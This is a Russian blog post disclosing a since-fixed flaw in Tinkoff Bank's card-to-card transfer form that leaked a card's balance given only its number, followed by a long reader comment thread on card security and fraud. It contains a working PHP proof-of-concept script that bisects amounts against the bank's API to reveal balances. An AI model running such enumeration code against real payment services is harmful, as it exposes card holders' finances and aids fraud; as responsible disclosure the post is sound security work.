Tinkoff скомпрометировал данные о балансе карт своих клиентов

UPD3: Уязвимость закрыли, баланс больше не проверяется.

Началось все с того, что в один прекрасный вечер попросил меня друг закинуть ему денег на карточку. Всегда решал такие проблемы либо через интернет-банк, либо через мобильное приложение, но поскольку с недавних пор у них интернет-банк превратился в дикого монстра, на этот раз решил воспользоваться их сервисом card2card.

Заполняю себе спокойно поля, и тут случается неожиданное:



Подождите, ведь я же не нажал кнопку отправить! Откуда это взялось? Поигрался с суммой, проверяется реальная сумма на карте.

Сначала я грешным делом подумал, что аякс отправляет на сервер все данные карты, включая CVC и срок действия, при каждом редактировании. Это, конечно, свинство, но https — пусть творят что хотят. Захожу в запросы браузера:



CVC не передается, это уже интересно. Зато передается срок действия, хоть какая-то защита, думаю я, хотя все еще в недоумении зачем проверять баланс карты аяксом на лету.

Но все же интерес докопать до конца не покидает и редактирую запрос:



Упс. На обратном конце не проверяется ничего, кроме номера карты отправителя.

Очевидно, что методом простого перебора легко подобрать сумму, ниже которой все ок, а выше уже ошибка — это и будет баланс карты. То есть, зная один лишь номер карты (который конечно информация не слишком публичная, но и не критичная, многие дают номера карт друзьям и даже выкладывают их в интернет для получения платежей) можно узнать, сколько там денег. Причем, как показали эксперименты, никакие месячные лимиты на это не влияют.

Дырка не критичная, но доступность этой информации в реальном времени позволяет отслеживать все расходы/пополнения — а это уже серьезнее.

Сразу же отписался безопасникам по публично доступной почте, но реакции, как обычно, ноль.

Быстренько набросал proof of concept (сильно не бейте, мой опыт программирования — бейсик в школе).

php внутри
<?php
header( 'Content-type: text/html; charset=utf-8' );

$card = $_GET['card'];
$card = preg_replace('/[^0-9]+/', '', $card);

if (strlen($card) != 16) {
	exit('<br>Wrong card number: ' . $card);
	
}

echo 'Probing card ' . $card . '... <br>';

flush();
ob_flush();
sleep(1);

$money = 50000;

$max = 1000000;
$min = 0;

$done = false;
$iter = 0;

while ($done == false) {

if($iter %5 == 0) {
  echo 'Still working, please hang on...<br>';
  flush();
  ob_flush();
  sleep(1);

}

$json = file_get_contents('https://www.tinkoff.ru/api/v1/payment_commission/?paymentType=Transfer¤cy=RUB&moneyAmount=' . $money . '&provider=c2c-anytoany&sessionid=1&origin=prt&cardNumber=' . $card . '&fieldtoCardNumber=1&fieldagreement=&securityCode=cvc&expiryDate=10/20');
$obj = json_decode($json);
$result = $obj->{'resultCode'};

  if ($result == "OK") {
    //need to increase
	$min = $money;
	$money = ($min + $max) /2;
	$last_total_money = round($obj->payload->total->value);
	
  } else {
    //need to decrease
	$max = $money;
	$money = ($min + $max) /2;
  }
  
  $iter++;
  
  if ((floor($max) - floor($min)) == 0) {
  
    $done = true;
	echo '<br><br>Money amount is ' . $last_total_money . ' roubles.';
  }
  
  if ($iter > 50) {
	  exit('<br><br>Something went terribly wrong, or the bug is already fixed. Last amount is ' . $last_total_money);
  }
  
}

?>

Ну и на правах побрюзжать. Последний интернет-банк получился абсолютно неюзабельным, грустно читать тут статьи разработчиков, которые им еще и гордятся. Переборщили так, что даже заходить лишний раз не хочется, грузится подольше некоторых игрушек, хорошо, хоть мобильное приложение пока нормальное.

Хэппи энд
Уязвимость закрыли в течение нескольких часов после публикации, буквально на следующий день Тинькофф банк объявил о программе баг баунти, а со мной связались представители банка и предложили неплохое (особенно с учетом публично разглашенной уязвимости) вознаграждение. Еще через шесть дней деньги упали на карту.
Такой реакции от банка я ожидал в последнюю очередь, и если честно с трудом представляю что-нибудь подобное от других крупных игроков. Если бы не этот нелепый инцидент с письмом, все было бы совсем хорошо.
Тинькофф, вы молодцы, ребята, продолжайте в том же духе.
Поделиться публикацией
  • Программист 1С
    от 70 000 до 100 000 руб.
    Компания БКС Новосибирск Полный рабочий день
  • DeVops инженер
    от 60 000 руб.
    ГисАвто Novosibirsk Новосибирск Полный рабочий день
  • QA engineer
    от 70 000 руб.
    Tickets Cloud Москва Полный рабочий день
AdBlock похитил этот баннер, но баннеры не зубы — отрастут

Подробнее
Реклама
Комментарии 428
  • +2
    Возможно в тз сам банк поставил пункт, где проверялся бы баланс без перезагрузки страницы, не слушая никаких аргументов со стороны разработчиков против этого. Для банка это фишка и удобно для пользователя, а на деле…
    • +3

      Так ведь можно же авторизовывать карту, не?

    • +32
      На самом деле это ж для мошенников раздолье. «Мы вам звоним из техподдержки банка, на вашем счету сейчас N руб. Но для *придумать действия* нам еще нужны дата действия карты и код с обратной стороны». Мда, Тинькофф Банк, печаль…
      • 0
        блин, неужели кто-то вот так готов рассказать данные?(
        • +11
          Многие и не знают, что цифры на карте это как бы секрет. И что вообще ей можно в интернете расплатиться как-то. И что такое интернет вообще.
          • +24
            Когда знакомился с картами, долго не мог поверить, что это «цифры на карте это как бы секрет». Их же кассирша видит, и сосед по очереди при желании может разглядеть, а запомнить три цифры — Штирлицем не надо быть. Видимо, схема придумывалась, когда информационную безопасность ещё не придумали.
            • +5
              К чести Тинькофф банка могу сказать, что они бесплатно дают вторую карту. На первой ставим запрет на интернет покупки. На второй запрет на офлайн покупки и вуаяля — светишь первую карту без опаски.
              • 0
                Две карты — как-то костыльно выглядит. В моём банке (зелёный такой, украинский) по умолчанию на всех картах стоит запрет на интернет операции, а если его выключить — можно установить лимит на снятие. Пока запрет включён — хоть на столбе напиши свои cvv и срок действия, но снять деньги не получится.
                • +1
                  В Тинькове также есть выключатель интернет-покупок и лимит по картам.
                  Просто лениво лазить и переключать настройки при необходимости купить что-либо в этих ваших интернетах. Вот и две карты.
                  • 0
                    Насколько знаю, можно и виртуальную завести.
                    • 0
                      Недавно так и хотел сделать, виртуальную карту для инет покупок, но оказалось, что без комиссии можно оплатить только тех, кто есть в их интернет-банке (тот же айтюнс уже не прокатит). И вот как бы вопрос, почему можно вторую карту выпустить и бесплатно ей оплачивать, а выпустить такую же карту, но без перевода пластика нельзя.

                      И да, новый интернет-банк просто адский. В этом месеце даже начал платить в сбербанк онлайне.
                      • –1
                        странно, в том же привате (зеленом украинском) виртуальные карты абсолютно идентичны пластику. разве что срок годности сильно больше. делаешь их сколько угодно. а если нужно расплачиваться в супермаркете, то делаешь себе пластик за 15 минут в любом отделении в неограниченных количествах и бесплатно. я как-то раз зашел закинуть деньги и случайно вышел с тремя новыми картами в разной валюте)
                      • 0
                        по виртуальной ни кредитного лимита, ни кэшбэка не будет
                    • 0
                      Запрет и лимиты тоже есть, но это ж включать надо каждый раз.
                      Две карты в том числе очень хорошо выглядит, когда карта теряется. Всегда под рукой запасная. Не приходится ждать две недели пока восстановят.
                    • НЛО прилетело и опубликовало эту надпись здесь
                      • +4
                        На Aliexpress когда-нибудь отоваривались?
                        3D secure не всегда обязателен.
                        • 0
                          Уже несколько лет, как для покупки авиа билета Аэрофлота через интернет не требуется никакого подтверждения через код SMS. Просто номер карты и CVC и… Приходит SMS. Радостно ожидаешь, что код подтверждения операции. А это — инфо о снятии денег. Вот какой-нибудь кассир супермаркета быстенько незаметно сфоткает карту с 2-х сторон и отправится за ваш счёт на Мальдивы.
                          Так с картой сбербанка. Интересно: у Сбера требовать объяснений ситуации или у каого ещё?
                          • НЛО прилетело и опубликовало эту надпись здесь
                            • 0
                              Наличие или отсутствие кода подтверждения 3DS в данной ситуации зависит только от сайта, где совершается покупка. У банка пивовара 3DS подключена ко всем картам по умолчанию, так что и по Тиньковской карте пришла бы смс. 3DS (если он есть на сайте и банк эмитент карты его поддерживает) не обойти.
                              • 0
                                Сайт может поддерживать 3DS, чтобы уменьшить потери от фрода. Думаю, для аэрофлота это не критично — у них не только есть все данные пассажира, а скорее всего, даже сам пассажир лично к ним придет.
                                • +1
                                  не сайт, а мерчант. сайты сами по себе ничего не решают, списание денег по карте идет не в 1 запрос жеж, там есть этап проверки карты и вот на нем есть флаг есть ли 3д на карте. если есть, то как ни крути, а придется делать проверку кода иначе отобьет операци. а вот мерчант, который выдается этим сайтам(типа id) бывает с игнорированием 3д, т.е. они могут забить на 3д, хотя по факту вернет ответ что на карте он есть. это касается только покупок в интернете, если делать перевод с карты на карту там без вариантов. у алиэкспресса, например, такой. это легаси в протоколе визы/мастера с тех пор, как разрешили отелям лочить сумму без любых проверок на карте для предзаказов, так опция для мерчантов игнорировать 3дсекьюр и появилась
                                  • 0
                                    Простите, а кто такой «мерчант»? Разве это не Аэрофлот, (или те чуваки, которые ему писали сайт, или те третьи чуваки, которые им продали либы для работы с пластиком — за этих всех все равно же отвечать аэрофлоту)?
                                    • 0
                                      Продавец услуг
                                      • 0
                                        мерчант в терминах визы-мастера это просто уникальный идентификатор по которому они опеределяют кто списывает деньги, его по договору нельзя передавать, потому да — отвечает тот кому выдали этот мерчант
                              • 0
                                Интересно: у Сбера требовать объяснений ситуации или у каого ещё?
                                Да. Вроде банки обязали сначала возвращать деньги, потом проводить расследование.

                                Покупка билета маловероятное событие, найти вора элементарно, а вот заказ в иностранном интернет-магазине (алиекспресс уже привели как пример) считай гиблое дело.
                                • НЛО прилетело и опубликовало эту надпись здесь
                                  • 0
                                    Может это и не закон, а рекомендация, не вдавался в подробности. Если закон — можно надавить.
                                    • НЛО прилетело и опубликовало эту надпись здесь
                                      • 0
                                        Надо погуглить на эту тему. На сколько слышал, банк идёт на встречу только при наличии заявления в органы.

                                        Ну и к слову: с дебетовой карты сумму, которой нет, списать нельзя, это аксиома. Просто дебетовые карты у нас в стране практически не используются, а используются овердрафтные. Там такая возможность есть, но пользователь (или злоумышленник) опять же не сможет воспользоваться суммой ниже баланса. Это может сделать только сам банк, например, списав плату за обслуживание (или другие услуги) при отсутствии средств. У сбера, кстати, овердрафтные карты платные, плата списывается раз в год и составляет от 400 до… дофига рублей в зависимости от типа карты.
                                        • НЛО прилетело и опубликовало эту надпись здесь
                                          • 0
                                            Вы не путайте карты с овердрафтом (странный микс кредитки с дебетовой), и технический овердрафт, который действительно может возникнуть даже в процессе обычного использования «до последней копейки». Просто наши банки любят брать комиссию за обслуживание под видом технического овердрафта.
                                            • +2
                                              Ну и к слову: с дебетовой карты сумму, которой нет, списать нельзя, это аксиома.

                                              Не правда. Технический овердрафт при курсовой разнице, оффлайн-операции без авторизации и куча других вариантов.
                                              • 0
                                                Так и есть, но это не дебетовые карты, а овердрафтные. Потому их и используют. Это удобнее всем, и банкам, и клиентам.
                                                • 0
                                                  Нет такого понятие в МПС. Есть кредитные и есть дебетовые, всё.
                                                  • 0
                                                    Ну тут даже вики говорит, что по дебетовым картам невозможно кредитование деньгами банка. Однако в ряде случаев возможен несанкционированный (технический) овердрафт. То есть по сути это одно и тоже, зависит от условий банка.
                                              • +1
                                                Еще как сможет
                                                При оффлайн авторизации (как раз, которая возможна на всех типах эмбоссированных карт) чем угодно — от необходимым образом настроенного злоумышленниками терминала, до импринтера, или копии карты — вас могут загнать в очень неплохой долг. Именно, в том числе, по этой причине сейчас банки спокойно отказывают в выдаче даже дебетовых карт без объяснения причин, а данных с вас собирают как на кредитную. С точки зрения рисков — любая карта — это риск для банка. Как пример — чудесная страна Англия. 75% АЗС по выходным там не используют онлайн авторизацию, и о своих расходах на бензин вы узнаете только в понедельник. И деньги с вас спишут, даже если на карте их нет.
                                            • 0
                                              Это правила Визы и Мастеркарда.

                                              В подобных случаях, вместе с завялением в банк, надо писать жалобу напрямую визе\мастеру. Они выдадут банку «стимул» соблюдать правила.
                                • 0
                                  Так их можно записать на бумажкузапомнить и стереть с карты лезвием.
                                  • 0
                                    В магазине могут не принять такую карту, а то и вообще забрать, если не будет паспорта с собой.
                                    • 0
                                      Вот хороший комментарий на эту тему.
                                      • 0
                                        Заклеить чем-нибудь (да хоть куском синей изоленты) и не выпускать карту из виду никогда. Любая компроментация будет явной, а способ сокрытия CVV — обратимым.
                                        • 0
                                          Лучше закрасить, например, маркером с краской (такой, с шариком внутри). И стойко, и не отклеится в тракте банкомата, заклинив карту, и смыть можно при желании.
                                          • 0
                                            Как это не выпускать никогда? Массово терминалы далеко то покупателя стоят, и в ту зону вас банально не пустят. А ездить бог знает куда в другой гипер — не всегда возможно.
                                            • +1
                                              За последние пару лет 90% магазинов, где я бываю (Пятерочка, Магнит, Ашан, Лента, Окей, Перекресток, Карусель + куча непродуктовых типа Икеи) оснастили терминалами с поддержкой PayPass/PayWave, теперь я карту из рук вообще почти не выпускаю.
                                              • 0
                                                У меня есть своя статистика — в РБ таких терминалов — кот наплакал.
                                                • 0
                                                  Это только на мелкие суммы же… до 1000 рублей, насколько помню. Или как-то по-другому работает? Ни разу еще не пользовался, хотя карт с пейпассом навалом.
                                                  • 0
                                                    Можно и больше 1000, но с пин-кодом
                                                    • 0
                                                      Да?! Надо срочно пробовать 8-) Хотя у нас и так в большинстве случаев терминал торчит к клиенту, сам втыкаешь карту и там же пин набираешь — разницы никакой.
                                                      • 0
                                                        Чаще всего пин-клавиатура совмещена со сканером, даже если туда нельзя воткнуть карту.
                                                      • 0
                                                        можно и вообще не картой, а приложением например ;)
                                                      • +1
                                                        Аэроэкспресс уже давно активно пропагандирует такой метод оплаты, ещё и 10% скидку на билет дают.

                                                        Так вот, на «заре» внедрения PayPass, когда ещё не все знали, что так можно, но уже можно было оплатить билет PayPass'ом, удалось повторить старый прикол про первые бесконтактные билеты на метро.

                                                        Положили карточку в загранпаспорт, подошли к билетному автомату и со словами «у меня годовая Британская виза! Именем Королевы!» приложили паспорт. Все удивились, когда из автомата вылез билет. Сейчас, конечно, эти уже никого не удивишь…

                                                        К чему я? Безусловно, используйте PayPass везде, где он есть, иногда это очень экономит время. Просто, раньше это было не только удобно, но и весело. А сейчас — просто удобно :-)
                                                    • 0
                                                      Петербург, наши дни. Такие ситуации случались только в кафе/ресторанах и самое плохое, что могло произойти — приходилось идти к стойке и смотреть вживую. Но в 95% случаев проблем нет, используются мобильные терминалы.
                                                  • +1
                                                    У меня так на кредитной карте сделано, стерт код полностью. За полтора года ни в одном магазине никто даже виду не подал. Если кассир начнет возмущаться, можно справедливо возразить, мол «а пошто вам барышня нужен мой код для оплаты в интернете?».
                                                    • 0
                                                      Срезал лезвием этот код на нескольких картах. Никаких проблем никогда не было. Учитывая, что все большее распространение получает PayPass, покупатель даже карту из рук не выпускает.

                                                      Хотя, некоторые кассиры этому недовольны. Один раз кассир даже отказалась проводить покупку, ссылаясь на то, что мы ей должны карту дать в руки, что ей что-то проверить :-)
                                                      • 0
                                                        У нас часто карту смотрят еще и с двух сторон. Пару раз попадал на ситуацию, когда отказывались принимать карту у людей, у которых на полосе для подписи проступала надпись void.

                                                        Ну и сами подтверждаете, что была проблема :)

                                                        У меня еще интересный случай был — пытался расплатиться в мелком магазине в Испании картой MasterCard мгновенного выпуска, на которой нет моих Имени и Фамилии, девушка попросила доки — дай ей водительское удостоверение РБ нового образца — она посмотрела его и сказала ОК :) Что она там могла сравнить — непонятно :)
                                                        • +1
                                                          В моем случае проблема была с головой у девушки, она отказалась проводить оплату и демонстративно отвернулась.

                                                          Осмотр карты с двух сторон — старый и распространенный прием сбора карточных данных. Над кассой висит камера, кассир пару раз переворачивает карту, так, чтобы на камере было хорошо видно обе стороны. Пока банки не перешли на 3DSecure (далеко не все банки перешли на него), этой информации было достаточно, чтобы купить что-то в интернете.
                                                        • 0
                                                          А разве кассир не должен сравнивать подпись на чеке и подпись на карте?
                                                          • 0
                                                            Если вводить pin-код или использовать PayPass/PayWave (что для сумм выше 1000₽ так же требует ввода pin-кода), подпись на чеке не требуется. Соответственно, и сравнивать нечего.
                                                            • 0
                                                              так же требует ввода pin-кода

                                                              Зависит от банка/от настроек. Мне удобнее без пина, по подписи, независимо от суммы.

                                                              • 0
                                                                Подписью обычно используется при прокатывании карты магнитной полосой.

                                                                Все современные терминалы и адекватные банки запрещают использование магнитной полосы, если терминал оборудован карт-ридером. В таких случаях, после прокатывания, терминал просит подумать еще раз и предлагает использовать чип. А это требует ввода пин-кода.

                                                                Да, иногда банки дают возможность изменить приоритет «подпись-чип». Но, ваш банк может и разрешить, а банк, обслуживающий конкретный терминал, может считать по-другому, и его мнение будет приоритетным.

                                                                А Вы, используя подпись вместо чипа, сильно повышаете риск кражи денег с карты. Считыватели магнитной полосы сейчас делают настолько миниатюрными, что Вы можете и не заметить, как кассир снимет копию карты…
                                                                • 0

                                                                  Ну я ни разу не видел, чтоб прокатывали магнитную полосу. Имел в виду именно чип/PayPass.
                                                                  Насчёт обслуживающего банка – на данный момент очень редко встречаются ситуации, когда терминал таки просит пин. Только в макдональдовских терминалах встречаю (ну и в банкоматах, само собой).


                                                                  Насчёт риска – насколько я понимаю, всё немного наоборот: при краже пина я никак не смогу оспорить транзакцию. А вот транзакции по подписи могут быть легко оспорены.

                                                                  • 0
                                                                    Оспорить-то можно, вопрос в том, удовлетворят ли.
                                                                    Вот сперли у вас карточку, купили что-то и расписались левой подписью. Вы транзакцию оспариваете. По идее нужно проводить анализ подписи. А он, по слухам, очень часто выдает что-то в стиле «подлинность подписи определить нельзя».

                                                                    Или я не прав и оспаривание в такой ситуации происходит по какой-то другой процедуре?
                                                                    • 0

                                                                      Без понятия, ни разу пока не попадал на какие-либо кражи денег с карточек (хотя пользуюсь ежедневно, как оффлайн, так и онлайн).


                                                                      Ну, в любом случае, это даёт шанс на оспаривание, в отличие от потери пин-кода – там, насколько я знаю, держатель карты "сам себе злобный буратино".

                                                                      • 0
                                                                        Был случай: спустя полгода после поездки в Тайланд у меня с кредитки сняли весь остаток. При чем, как я выяснил в службе поддержки банка, было совершено 5 попыток снятия наличных, и только на пятый раз угадали остаток (около 3000₽).

                                                                        Обращение в банк + копия загранпаспорта + 2 недели ожидания — и деньги вернули. Конечно, сумма не такая большая, они могли больше ничего не проверять. А в других случаях банк может запрашивать дополнительные данные, например, записи с камеры банкомата/магазина, где провели левую операцию.
                                                                        • 0
                                                                          А транзакция была подтверждена pin'ом?

                                                                          Слухи о невозможности опротестовать транзакцию подтвержденную pin'ом слышу очень часто. А не засветить pin в наших магазинах — это практически нереальная задача.
                                                                          • 0
                                                                            На моих картах по дефолту запрещены все транзакции с иностранных государств. Перед поездкой звоню оператору и прошу включить «Особый режим» для нужных карт, сроки ставлю равные срокам пребывания в стране, если надо будет дольше — можно ещё раз позвонить.
                                                                            Довольно эффективно при зарубежных поездках. Иногда приходится включать отдельную страну на один день, как пример, при платежах в Steam и подобных системах.
                                                                        • 0
                                                                          Одного пин-кода мало, нужно еще и чип скопировать (либо, украсть карту).
                                                                          А это сделать намного сложнее, чем скопировать магнитную полосу.

                                                                          Оспорить операцию можно, если докажете, что ее проводили не Вы и оригинальная карта в это время находилась тоже у Вас. Например, кто-то снял наличные в банкомате Тайланда. Вы в это время были в Москве (подтверждается загранпаспортом и другими способами) и тоже пользовались своей картой. Хотя, по идее, такие операции должны попадать под дополнительный контроль СБ — как банка, так и платежной системы.
                                                                        • 0
                                                                          после прокатывания, терминал просит подумать еще раз и предлагает использовать чип. А это требует ввода пин-кода

                                                                          А вот и нет :) У меня карточка корейского банка, и пин-код требуется только при оплате на территории Кореи.
                                                                          При оплате в других странах авторизация всегда идёт через чип, но пин-код никогда не запрашивается.
                                                                          Скорее всего, это защита от иностранных кардеров, чтобы не было возможности увести пин, потому что этот же самый пин-код (да, пин-код кредитки) используется для подтверждения онлайн-транзакций.
                                                                      • 0
                                                                        А на карте написано что без подписи недействительна.
                                                                        • +1
                                                                          Это абсолютно никак не связанные друг с другом факты:
                                                                          1. Карта без подписи не действительна — на карте обязательно должна быть подпись клиента.
                                                                          2. При оплате с вводом пин-кода клиент не выпускает карту из рук — и, правда, зачем?
                                                                          3. При оплате с вводом пин-кода кассир не проверяет соответствие подписи, так как сама подпись не ставится.
                                                                          • 0
                                                                            Часто терминалы далеко от клиента ( у нас в РБ) и кассир в любом случае берет карту в руки и может посмотреть подпись. Плюс у кассира есть инструкция, что он может потребовать документ, удостоверяющий личность, если у него возникли сомнения во владельце карты.
                                                                            • 0
                                                                              Магазины могут придумывать любые внутренние правила, но они не будут иметь никакой силы, они ведь «внутренние». Значение имеют только правила банков и правила платежной системы, при чем, вторые — в приоритете.

                                                                              Да, у вас имеют право требовать паспорт даже при оплате магнитной полосой. А платежные системы дают вам право отказать в этом.

                                                                              Вот цитата из правил Сбера, где видео, что вместо паспорта можно использовать пин-код:
                                                                              Кассир торгово-сервисного предприятия может потребовать предъявления документа, удостоверяющего Вашу личность. В случае отсутствия документа Вам может быть отказано в проведении операции по карте.

                                                                              В случае если операция проводится с использованием электронного терминала, кассир может предложить Вам самостоятельно вставить карту в терминал и ввести ПИН-код на выносной клавиатуре электронного терминала. При отказе ввести ПИН-код или неверном вводе ПИН-кода в операции может быть отказано. Несогласие подписать чек (слип) электронного терминала также может привести к отказу в проведении операции."
                                                                              • 0
                                                                                Магазины могут придумывать любые внутренние правила, но они не будут иметь никакой силы, они ведь «внутренние». Значение имеют только правила банков и правила платежной системы, при чем, вторые — в приоритете.
                                                                                Ну не совсем так. Торговая точка подчиняется соглашению с банком. Банк подчиняется соглашению с платежной системой. В идеальном мире, это бы означало то что вы написали. В реальном мире же, платежная система может долго бодаться с банком, а в это время торговые точки продолжают подчиняться соглашению с банком (и за нарушение этого соглашения торговой точке может и прилететь). Понятно, что в финале все сойдется к идеальному миру, но этот процесс может длиться годами и оборваться закрытием банка.

                                                                                Ну и справедливости ради, торговая точка имеет право вводить свои правила (пока они не противоречат закону, который, в данном случае, строг, но некоторые вольности все же позволяет).
                                                                                • 0
                                                                                  Ключевой момент — «в идеальном мире» — да, согласен. А по факту, торговые точки в лице кассира, часто по его же инициативе, придумывает новые правила, которые не только нигде не прописаны, но и идут в разрез с правилами банка или платежной системы. Например, любят требовать подпись на слипе при вводе пин-кода, ссылаясь на внутренние приказы.

                                                                                  Допустим, торговая точка действительно ввела такое правило. Ок. Законом это не запрещено? Да, вроде бы, не запрещено. Но, такое правило не имеет ничего общего с реальностью, так как в правилах почти всех банков указано «либо подпись, либо пин-код».
                                                                                  • 0
                                                                                    Но, такое правило не имеет ничего общего с реальностью, так как в правилах почти всех банков указано «либо подпись, либо пин-код».
                                                                                    Зависит от формулировок. Или не всегда исключающее :)

                                                                                    А по факту — да, это чаще всего самоуправсто на местах от небольшого ума. При этом вряд ли это даже инициатива кассира. Скорее какой-нибудь эффективный менеджер составил инструкцию на основе дикой помеси правил и слухов. Я вот как-то в одном магазине видел иконочку наклеенную на терминал. Очень надеюсь, что это был троллинг…
                                                                                • 0
                                                                                  У людей нет столько времени спорить с кассиром.
                                                                                  Почему вы решили, что правила платежной системы в приоритете? В РБ в приоритете только правила НацБанка.
                                                                                  4.2. При совершении операции с использованием платежного терминала (POS-тер-
                                                                                  минала) кассир может потребовать у вас ввести ПИН-код или подписать карт-чек в соот-
                                                                                  ветствии с требованиями, установленными правилами платежных систем, а также предо-
                                                                                  ставить паспорт в целях установления личности держателя карточки.
                                                                                  • 0
                                                                                    http://www.visa.com.ru/common/pdf/Visa_Payment_System_Operating_Regulations_Russia.pdf

                                                                                    Нет вообще упоминаний про паспорт или документ удостоверяющий личность, однако даже в Испании меня просили показать доки, что карточка моя.
                                                                          • 0
                                                                            А у меня в паре мест (экзист и клиника будь здоров) сверяют ФИО на карте и ФИО в документе, а если разные — отказываются принимать
                                                                  • 0

                                                                    Так кто отменял подтверждение платежей смс?

                                                                    • 0
                                                                      Реализация работы платёжных систем.
                                                                      • 0
                                                                        AWS не поддерживает 3dsec и снимает деньги без СМС.
                                                                      • +1
                                                                        пережитки древности.

                                                                        чтобы быть в более современной плоскости, я получая новую карту удаляю механическим путем с нее CVV. есть банки, которые не просто краской наносят CVV, а еще и выдавливают его на карте, что его отпечаток виден на лицевой стороне (идиоты).

                                                                        могут сказать, что карты собственность банка и это порча карты. но почему тогда банк так же не рисует на карте PIN? ведь по сути CVV это второй PIN.
                                                                        (еще раз идиоты)

                                                                        imho, CVV должен быть передан клиенту в конверте, вместе с PIN.
                                                                        • 0
                                                                          Пока CVV используется не так часто, как PIN, пользователи не будут его помнить. В нужный момент, просто не смогут что-то купить в интернете. Есть другое решение: карты с динамическим CVV (Data Sheet).
                                                                      • +1
                                                                        Если у кого-то есть карта Тинькофф и он не знает про интернет — это, как минимум, странно.
                                                                      • +1
                                                                        У меня недавно был случай, мать знакомой хотела мебель на Авито купить, нашла какой-то диван и типа дешево, позвонила. Ей говорят что много желающих, типа если внесете предоплату то ваш. Она и согласилась, ну и говорят что можно быстро, по карте… И её попросили продиктовать все цифры спереди и сзади карты… ну и потом все деньги с её карты пропали. Она тоже типа «Ну мне в банке сказали что ПИН код никому не говорить, это секрет»…
                                                                        • 0
                                                                          Это хорошо ещё, что уже повсеместно двухфакторную авторизацию ввели…
                                                                          • 0

                                                                            ну вот есть такая авторизация у одного зелёного, а один оранжевый интернет-провайдер у нас в городе снимает деньги с карты "по старинке" и по сей день

                                                                            • +1
                                                                              Не у всех банков все идет по умолчанию, у некоторых надо эти сервисы подключать и даже за них платить. Скажи какой-то пенсионерке «Двух-факторная идентификация владельца карты», она крестится начнет :)

                                                                              Или, у меня есть карта ВТБ24, так у них за смену пина берут деньги… в общем пытаются зарабатывать на моей безопасности.
                                                                          • +1
                                                                            В штатах это нормальная практика — хочешь закрыть договор связи, заказать что-то по телефону, чтоб привезли из другого штата и любой другой ситуации. Чтобы не приезжать в офис диктуешь номер карты и код по телефону. Я был в шоке, когда первый раз увидел такой метод оплаты.
                                                                            • +2
                                                                              Компенсируется zero liability кредитных компаний.
                                                                              То есть если пользователь пожаловался, ему сначала возвращают деньги, потом заводят дело о мошенничестве (на кого посчитают нужным).
                                                                              • 0

                                                                                Или не заводят, в зависимости от суммы ущерба.

                                                                                • 0
                                                                                  Насколько я знаю, само деяние в виде использования электросвязи или государственной почти для совершения преступления по американским законам есть отдельное преступление, расцениваемое на уровне лжи под присягой и караемое на уровне пресловутой 58-й статьи УК РСФСР 1922-1960 годов. Равно как и подача заведомо проигрышного иска и использование поддельных документов в суде. Там попытки использовать государственную правовую машину, почту или телеком с преступных целях рассматриваются сами по себе как государственные преступления…
                                                                            • +4
                                                                              Amazon'у даже CVC не нужен :)
                                                                              • +1
                                                                                у меня был случай, когда в отеле просто не было такого функционала — ввода cvv2 кода. только номер и дата. банк же упорно реджектил все. я даже нашел в настройках где можно отключить проверку cvv2, но не получилось и пришлось просить карту знакомого британца. у него все прошло без вопросов.
                                                                                • +1
                                                                                  Тогда кстати вашу карточку неполучится привязать к paypal так-как paypal тоже совершает все операции без cvv2. Только первичная валидация требует cvv2
                                                                            • 0
                                                                              Так что ж вы раньше-то не придумали секретный код и секретную дату?
                                                                              • 0
                                                                                У ТБ вводить смс код всегда обязательно, так что ещё смс код выпытать прийдется.
                                                                                • 0
                                                                                  Не везде кстати, например на Aliexpress (как выше писали) СМС подтверждения нет. На Amazon кстати тоже.
                                                                                  • 0
                                                                                    Это особо доверяемые операторы…
                                                                                    • 0
                                                                                      Нет. Это зависит от усмотрения магазина. Хотят добавлять 3ds будет, нет следовательно не будет никаких подтверждений.
                                                                              • +17
                                                                                подождите ка минуточку, это тот банк, который написал интересную клаузу всем френдам одного товарища в контактике, который что то там по кредиту просрочил? Он, да? И вы у него счет держите? Серьезно?
                                                                                • +1
                                                                                  Ну его карты mastercard gold ещё и к яндекс-кошельку дешево привязывались для покупок в магазинах (150-200 р. за 3 года обслуживания и 0% комиссий при оплате картой). Потом правда система Я-Д сама эмиссией карт занялась.
                                                                                  • +1
                                                                                    Все таки жители РФ странные люди: их банк сознательно нарушает кучу законов, распространяет кучу строго конфеденциальной информации, плюет в лицо своим клиентам, а они по прежнему им ппользуются да еще и жалуются на какие то там дыры в безопасности. Что этот банк должен сделать ещё, что бы вы наконец осознали, что вы люди с правами, а не тварь дрожащяя?
                                                                                    • +14
                                                                                      Ваше мнение, безусловно. Но вы можете также ознакомиться с мнением других клиентов различных банков. Есть достаточно популярный ресурс банки-ру. Сравните. Я год назад сравнил и очень доволен.
                                                                                      • +1
                                                                                        Значит, Вам повезло, и в отношении лично Вас этот банк не нарушал законов. А мне досталось, хотя я даже не клиент, и никогда им не был. Просто им очень хотелось, чтобы я им стал.
                                                                                        • –7
                                                                                          «Я эту книгу не читал, но считаю, что она — полное дерьмо»…
                                                                                          • –3
                                                                                            Не понимаю, почему аналогичное по смыслу высказывание пользователя выше «никогда не был их клиентом, но банк плохой» ни у кого не вызвало такую же бурю негодования? :-)
                                                                                            • +3
                                                                                              Наверное потому, что я чётко сказал, что их клиентом не был, но они в отношении меня нарушали федеральные законы? Может быть, я не совсем чётко поведал, что мне пришлось тратить время и силы на борьбу с ними.
                                                                                              Так что книгу читал, но не по своей воле.
                                                                                              • 0
                                                                                                Тогда, приношу извинения.
                                                                                                • 0
                                                                                                  Принято. :) Я обиды не держу.
                                                                                              • 0
                                                                                                Потому что ваш комментарий совсем неуместен, так как строится на ошибочном восприятии комментария icoz. Он сказал, что он не являлся клиентом, а банк уже проявил к нему то, что позволило сделать негативные выводы.
                                                                                        • +15
                                                                                          Тем или иным способом «плюет в лицо своим клиентам» примерно любой банк в РФ.
                                                                                          • –2
                                                                                            Ну не любой, а вот тинькофф успел неплохо себе репутацию испортить.
                                                                                            • +7
                                                                                              Так вы сразу список выкладывайте, за кого поручитесь?
                                                                                              • +1
                                                                                                Поручусь — ни за кого. Но тот же Рокетбанк пока что пушистый, например срочно сообщил, когда их банк-партнёр должен был через день закрыться, что бы все успели вывести деньги. Баги в мобильном приложении порой закрывают в течении часа после обращения. Известных мне гадостей пока сделать или опубликовать не успели.

                                                                                                Был минус — снижение ставок по картам с определённого срока сообщили без пуш-уведомления, просто внутри приложения, это было для меня не критично, но неприятно — так что они тоже не идеал. Но в плане известных мне банков у них пока что карма наиболее чистая. Возможно не в последнюю очередь потому, что кредитов они не раздают.
                                                                                                • +2
